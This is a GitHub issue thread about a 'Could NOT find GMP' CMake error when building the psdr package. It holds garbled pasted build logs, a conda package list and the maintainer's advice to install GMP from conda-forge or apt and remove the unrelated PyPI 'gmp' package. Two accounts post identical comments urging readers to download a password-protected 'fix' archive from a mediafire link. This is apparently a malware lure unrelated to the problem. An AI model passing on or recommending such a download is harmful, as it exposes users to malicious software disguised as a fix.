### ISSUE TITLE
Could NOT find GMP (missing:GMP_LIBRARIES GMP_INCLUDE_DIR)

### ISSUE THREAD

**Issue by fangyipeng** [raphaelsulzer/psdr#2]
Hi,DR.Raphael,I'm having this problem when I run the pip install psdr/. command. Is there any way to fix it?

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by fangyipeng** [comment]
(base) root@camera40: /home/cyberverse/psd r-main# conda activate psdr
(psdr) root@camera40:/home/cybe rverse/psdr-main# pip install psdr/.
Processing ./psdr	Installing build dependencies. . done	Getting requirements to build wheel ... done	Installing backend dependencies . done	Preparing metadata (pyproject . toml) . done	Building wheels for collected packages: pypsdr	Building wheel for pypsdr (pyproject.toml) error	error: subprocess-exited -with-error
Building wheel for pypsdr (pyproject.toml) did not run successfully.	exit code: 1
[27 lines of output]	*** scikit-build-core 0.10.5 using CMake 3.30.2 (wheel)	2024-08-27 11:26:33,403 - scikit build core - WARNING - No license files found, set wheel.license-files to [] to su
ppress this warning
६९	Configuring CMake.	loading initial cache file build/cp39-cp39-linux x86 64/CMa keInit.txt	The CXX compiler identification is GNU 7.5.0	Detecting CXX compiler ABI info	Detecting CXX compiler ABI info - done	Check for working CXX compiler: /usr/bin/g++ - skipped	Detecting CXX compile features	Detecting CXX compile features - done	Using header-only. CGAL	Targetting Ninja	Using /usr/bin/g++ compiler.	CMake Error at /tmp/pip-build-env- s2ytkllo/normal/lib/python3 .9/site-packages/cmake/data/sha re/cmake-3.30/Modules/F	indPackageHandlestandardArgs. cmake: 233 (message):	Could NOT find GMP(missing: GMP LIBRĂRIES GMP INCLUDE DIR)	معحم ج	Call Stack (most recent call-first):	/tmp/pip-build-env-s2ytkllo/no rmal/lib/python3.9/site-packages/ cmake/data/ share/ cmake-3. 30/Modules/FindPackageHan
Could NOT find GMP (missing: GMP LIBRARIES GMP_INCLUDE_DIR)	Call Stack (most recent call first):	/tmp/pip-build-env-s2ytkllo/no rmal/lib/python3.9/site-packages/ cmake/data/ share/ cmake-3. 30/Modules/FindPackageHan	dlestandardArgs. cmake:603 ( _FPHSA_FAILURE_MESSAGE)	/home7anaconda3/envs/psd r/lib/cmake/CGAL/FindGMP. cmake:53 (find_ package_handle_standard_args)	/home/anaconda3/envs/psd r/lib/cmake/CGAL/CGAL SetupGMP. cmake:24 (find_package)	/home/anaconda3/envs/psd r/lib/cmake/CGAL/CGAL SetupCGALDependencies. cmake:41 (include)	/home/anaconda3/envs/psd r/lib/cmake/CGAL/CGALCon fig. cmake:125 (include)	CMakeLists.txt:22 ( find package)
Configuring incomplete, errors occurred!
p६	CMake configuration failed	[end of output]
note: This error originates from a subprocess.	and is likely not a problem with pip.	ERROR: Failed building wheel for pypsdr	Failed to build pypsdr	الشم ٢ك	ERROR: ERROR: Failed to build installable wheels for some pyproject.toml based projects (pypsdr)	(psdr) root@camera40: /home/cyberverse/psdr-main#

**Comment by raphaelsulzer** [comment]
Hi,

you can try to run `conda install conda-forge::gmp` first.

**Comment by fangyipeng** [comment]
still fail.

loading initial cache file build/cp39- cp39-linux_x86_64/CMakeInit.txt
- The CXX compiler identification is GNU 7.5.0
Detecting CXX compiler ABI info	Detecting CXX compiler ABI info - done	Check for working CXX compiler: /usr/bin/g++ - skipped	Detecting CXX compile features	Detecting CXX compile features - done	Using header-only CGAL
Targetting Ninja	 Using /usr/bin/g++ compiler.	CMake Error at /tmp/pip- build-env-wjk9uouy/no rmal/lib/python3.9/site-packages/cmake/data/ share/cmake-3 . 30/Modules/F	indPackageHandlestandardArgs. cmake:233 (message):	Could NOT find GMP(missing: GMP LIBRARIES GMP INCLUDE_DIR)	Call Stack (most recent call first):
/tmp/pip-build-env-wjk9uouy/no rmal/lib/python3.9/site-packages/ cmake/data/ share/ cmake-3. 30/Modules/FindPackageHan	dleStandardArgs. cmake:603 (_ FPHSA FAILURE MESSAGE)	/home/anaconda3/envs/psd r/lib/cmake/CGAL/FindGMP. cmake:53 (find_package_handle_s tandard_args)	/home/anaconda3/envs/psd r/lib/cmake/CGAL/CGAL_Set upGMP. cmake:24(find_package)	/home/anaconda3/envs/psdr/lib/cmake/CGAL/CGAL_SetupCGALDependencies . cmake:41 (include)	/home/anaconda3/envs/psd r/lib/cmake/CGAL/CGALConfig . cmake: 125 (include)	CMakeLists.txt:22 ( find_package)
1	Configuring incomplete, errors occurred!
*** CMake configuration failed	[end of output]
note:	This error originates from a subprocess,	and is likely not a problem with pip.	ERROR: Failed building wheel for pypsdr	Failed to build pypsdr	
	ERROR: ERROR: Failed to build installable wheels for some pyproject.toml based projects (pypsdr)	(psdr) root@camera40: /home/cyberverse/psdr-main#

**Comment by raphaelsulzer** [comment]
> loading initial cache file build/cp39- cp39-linux_x86_64/CMakeInit.txt

It is probably better to delete the build folder before retrying.

Can you show me the output of `conda list` (of the psdr environment)?

**Comment by fangyipeng** [comment]
sincerely thank you.but still fail .
conda list >env.txt 
# packages in environment at /home/anaconda3/envs/psdr:
#
# Name                    Version                   Build  Channel
_libgcc_mutex             0.1                 conda_forge    conda-forge
_openmp_mutex             4.5                       2_gnu    conda-forge
blosc                     1.21.5               hc2324a3_1    conda-forge
boost                     1.72.0           py39ha90915f_1    conda-forge
boost-cpp                 1.72.0               he72f1d9_7    conda-forge
bzip2                     1.0.8                h4bc722e_7    conda-forge
ca-certificates           2024.7.4             hbcca054_0    conda-forge
cgal                      5.6.1.post202406030950          pypi_0    pypi
cgal-cpp                  5.0.1                h747953b_1    conda-forge
colorama                  0.4.6                    pypi_0    pypi
columnar                  1.4.1                    pypi_0    pypi
cpp-filesystem            1.3.8                h0efe328_0    conda-forge
eigen                     3.4.0                h00ab1b0_0    conda-forge
eigen3                    3.3.7                         0    omnia
ffmpeg                    4.3.2                h37c90e5_3    conda-forge
fmt                       11.0.2               h434a139_0    conda-forge
freetype                  2.12.1               h267a509_2    conda-forge
gettext                   0.22.5               he02047a_3    conda-forge
gettext-tools             0.22.5               he02047a_3    conda-forge
giflib                    5.2.2                hd590300_0    conda-forge
gmp                       0.0.17                   pypi_0    pypi
gnutls                    3.6.13               h85f3911_1    conda-forge
hdf5                      1.10.5          nompi_h5b725eb_1114    conda-forge
highfive                  2.1.1                h71ab163_4    conda-forge
icu                       70.1                 h27087fc_0    conda-forge
ilmbase                   2.5.5                h780b84a_0    conda-forge
jpeg                      9e                   h0b41bf4_3    conda-forge
lame                      3.100             h166bdaf_1003    conda-forge
lcms2                     2.14                 h6ed2654_0    conda-forge
ld_impl_linux-64          2.40                 hf3520f5_7    conda-forge
lerc                      3.0                  h9c3ff4c_0    conda-forge
libasprintf               0.22.5               he8f35ee_3    conda-forge
libasprintf-devel         0.22.5               he8f35ee_3    conda-forge
libblas                   3.9.0           23_linux64_openblas    conda-forge
libcblas                  3.9.0           23_linux64_openblas    conda-forge
libdeflate                1.12                 h166bdaf_0    conda-forge
libffi                    3.4.2                h7f98852_5    conda-forge
libflac                   1.3.4                h27087fc_0    conda-forge
libgcc-ng                 14.1.0               h77fa898_0    conda-forge
libgettextpo              0.22.5               he02047a_3    conda-forge
libgettextpo-devel        0.22.5               he02047a_3    conda-forge
libgfortran-ng            14.1.0               h69a702a_0    conda-forge
libgfortran5              14.1.0               hc5f4f2c_0    conda-forge
libgomp                   14.1.0               h77fa898_0    conda-forge
liblapack                 3.9.0           23_linux64_openblas    conda-forge
libnsl                    2.0.1                hd590300_0    conda-forge
libogg                    1.3.5                h4ab18f5_0    conda-forge
libopenblas               0.3.27          pthreads_hac2b453_1    conda-forge
libopus                   1.3.1                h7f98852_1    conda-forge
libpng                    1.6.43               h2797004_0    conda-forge
libraw                    0.20.2               h9772cbc_2    conda-forge
libsndfile                1.0.31               h9c3ff4c_1    conda-forge
libsqlite                 3.46.0               hde9e2c9_0    conda-forge
libstdcxx-ng              14.1.0               hc0a3c3a_0    conda-forge
libtiff                   4.4.0                hc85c160_1    conda-forge
libuuid                   2.38.1               h0b41bf4_0    conda-forge
libvorbis                 1.3.7                h9c3ff4c_0    conda-forge
libwebp                   1.1.0                h76fa15c_4    conda-forge
libwebp-base              1.1.0                h36c2ea0_3    conda-forge
libxcrypt                 4.4.36               hd590300_1    conda-forge
libzlib                   1.2.13               h4ab18f5_6    conda-forge
lz4-c                     1.9.4                hcb278e6_0    conda-forge
mpfr                      4.0.2                hb69a4c5_1    anaconda
ncurses                   6.5                  h59595ed_0    conda-forge
nettle                    3.6                  he412f7d_0    conda-forge
numpy                     1.26.4           py39h474f0d3_0    conda-forge
openexr                   2.5.5                hf817b99_0    conda-forge
openh264                  2.1.1                h780b84a_0    conda-forge
openimageio               2.2.7                h674cfdc_2    conda-forge
openssl                   3.3.1                hb9d3cd8_3    conda-forge
pip                       24.2               pyhd8ed1ab_0    conda-forge
python                    3.9.19          h0755675_0_cpython    conda-forge
python_abi                3.9                      5_cp39    conda-forge
readline                  8.2                  h8228510_1    conda-forge
setuptools                72.2.0             pyhd8ed1ab_0    conda-forge
snappy                    1.2.1                ha2e4443_0    conda-forge
spdlog                    1.14.1               hed91bc2_1    conda-forge
string-color              1.2.3                    pypi_0    pypi
tk                        8.6.13          noxft_h4845f30_101    conda-forge
toolz                     0.12.1                   pypi_0    pypi
tzdata                    2024a                h0c530f3_0    conda-forge
wcwidth                   0.2.13                   pypi_0    pypi
wheel                     0.44.0             pyhd8ed1ab_0    conda-forge
x264                      1!161.3030           h7f98852_1    conda-forge
xtensor                   0.24.7               h00ab1b0_0    conda-forge
xtensor-io                0.13.0               h4bd325d_0    conda-forge
xtl                       0.7.7                h00ab1b0_0    conda-forge
xz                        5.2.6                h166bdaf_0    conda-forge
yaml-cpp                  0.8.0                h59595ed_0    conda-forge
zlib                      1.2.13               h4ab18f5_6    conda-forge
zstd                      1.5.6                ha6fb4c9_0    conda-forge

**Comment by raphaelsulzer** [comment]
> gmp 0.0.17 pypi_0 pypi

seems to be this [pypi package](https://pypi.org/project/gmp/) and not the GNU Multiple Precision Arithmetic Library (GMP).

Maybe you need to run `pip uninstall gmp` first.
And then, you need to install GMP in the conda environment e.g. with `conda install conda-forge::gmp` . 
Or a system wide installation, e.g. with `apt install libgmp-dev` depending on your OS.
